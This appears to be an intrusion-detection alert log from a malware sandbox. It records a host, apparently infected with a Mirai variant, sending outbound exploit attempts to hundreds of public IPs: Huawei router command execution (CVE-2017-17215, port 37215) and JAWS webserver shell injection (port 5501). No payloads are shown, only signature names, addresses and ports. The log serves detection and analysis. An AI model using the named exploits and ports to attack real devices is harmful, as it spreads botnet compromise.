                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333580223.239.211.11137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233799037.168.234.835501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233799037.168.234.835501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344200105.175.182.17337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341642186.130.210.4937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351820174.145.15.2195501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351820174.145.15.2195501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352170181.14.82.16737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339034145.78.220.1145501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339034145.78.220.1145501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337330111.23.155.685501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337330111.23.155.685501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343568223.211.40.7637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348732105.182.132.8137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360940105.78.212.6137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359102105.141.157.16737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349516102.116.194.24837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348630102.76.15.8637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353568102.84.6.22837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354524223.29.241.11237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336470197.133.63.737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338734197.253.151.3037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234600491.120.18.975501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234600491.120.18.975501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335248108.77.51.795501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335248108.77.51.795501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351728190.7.122.8237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353802181.126.238.18437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233764427.167.173.415501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233764427.167.173.415501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341742105.204.223.1337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234215297.121.209.2165501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234215297.121.209.2165501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360110161.229.184.1055501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360110161.229.184.1055501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235786499.33.106.1195501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235786499.33.106.1195501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338518186.162.115.1237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345270138.176.54.1075501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345270138.176.54.1075501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360142129.15.250.745501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360142129.15.250.745501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345140170.159.26.1915501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345140170.159.26.1915501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23472849.93.123.745501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23472849.93.123.745501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350092186.218.237.1037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234748440.119.121.2065501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234748440.119.121.2065501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236091025.213.102.215501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236091025.213.102.215501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351672156.248.196.3837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234870898.151.179.2015501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234870898.151.179.2015501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342816107.100.184.15501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342816107.100.184.15501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235137224.124.62.555501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235137224.124.62.555501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344040160.145.200.15537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350718160.118.213.9737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357778206.49.60.1905501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357778206.49.60.1905501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336774105.36.198.19737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337992167.142.201.2475501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337992167.142.201.2475501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337306116.31.247.65501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337306116.31.247.65501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235061065.26.16.1635501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235061065.26.16.1635501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333258186.146.169.21237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336978160.85.17.15437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340670197.43.134.7237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233994236.66.45.735501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233994236.66.45.735501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235092681.50.252.2385501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235092681.50.252.2385501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343792186.1.24.1537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353436156.71.62.1837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336060190.159.128.5337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354702192.180.179.2445501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354702192.180.179.2445501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356684134.30.7.1625501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356684134.30.7.1625501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336630105.71.38.4537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333528160.254.132.22037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234992445.67.168.1755501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234992445.67.168.1755501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357574102.181.31.8037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350640156.234.112.4037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335068160.178.83.137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234708413.129.11.1265501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234708413.129.11.1265501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350038113.97.48.1285501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350038113.97.48.1285501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337666198.36.161.2435501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337666198.36.161.2435501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358412181.180.121.9537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352760160.244.162.22437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342654181.82.215.337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355920128.140.242.1645501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355920128.140.242.1645501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344734223.204.132.16837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333282156.95.90.1937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334538186.201.223.13337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333602128.208.77.35501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333602128.208.77.35501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349534196.25.159.535501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349534196.25.159.535501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357346157.207.146.4537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338742102.199.138.5037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350922181.159.186.5937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235782859.169.73.1855501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235782859.169.73.1855501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235773427.248.238.435501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235773427.248.238.435501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358708192.230.61.2505501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358708192.230.61.2505501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353592105.240.248.3937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349356197.211.26.23337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334562105.218.159.5437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337656181.218.174.7137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341228157.152.139.19837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340372105.155.140.21537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333270157.211.71.565501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333270157.211.71.565501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338370204.154.195.1915501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338370204.154.195.1915501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341580190.134.243.12437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.236070841.141.22.9437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336382186.199.78.24937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342516186.59.68.13137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335036186.69.141.15337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235887249.255.209.235501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235887249.255.209.235501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336210157.120.217.4537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359606186.136.240.13537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23577749.26.235.1315501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23577749.26.235.1315501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355026105.45.20.14637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343860156.188.48.16037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234165643.12.72.225501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234165643.12.72.225501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339536160.68.156.12737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234579497.158.104.1655501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234579497.158.104.1655501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341530217.104.129.1785501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341530217.104.129.1785501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342300129.59.74.2535501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342300129.59.74.2535501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2332842156.36.228.3137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233725670.35.208.445501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233725670.35.208.445501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340610186.39.232.12437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234492897.112.48.1115501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234492897.112.48.1115501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352980157.250.30.21037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235033623.5.19.1165501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235033623.5.19.1165501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360282148.181.80.355501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360282148.181.80.355501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333850105.100.130.17437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235230441.36.109.19037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357862186.37.78.24037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347178105.26.127.22537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234418072.211.227.2045501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234418072.211.227.2045501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346482186.203.119.12937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337262102.191.124.20437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360666186.246.181.11537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234564269.22.221.165501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234564269.22.221.165501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351058186.109.217.21137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234955014.51.114.55501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234955014.51.114.55501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358302156.33.64.15737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356006186.146.164.11837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234359867.68.20.2195501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234359867.68.20.2195501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.236006841.0.61.637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353058181.83.233.4537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346382156.110.139.17037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359284105.197.92.19637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334432186.24.95.2237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235971217.192.252.985501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235971217.192.252.985501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345210197.195.53.24337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348762186.104.33.21637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358492102.125.184.18037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347556138.152.111.125501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347556138.152.111.125501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337538157.21.111.3837215TCP
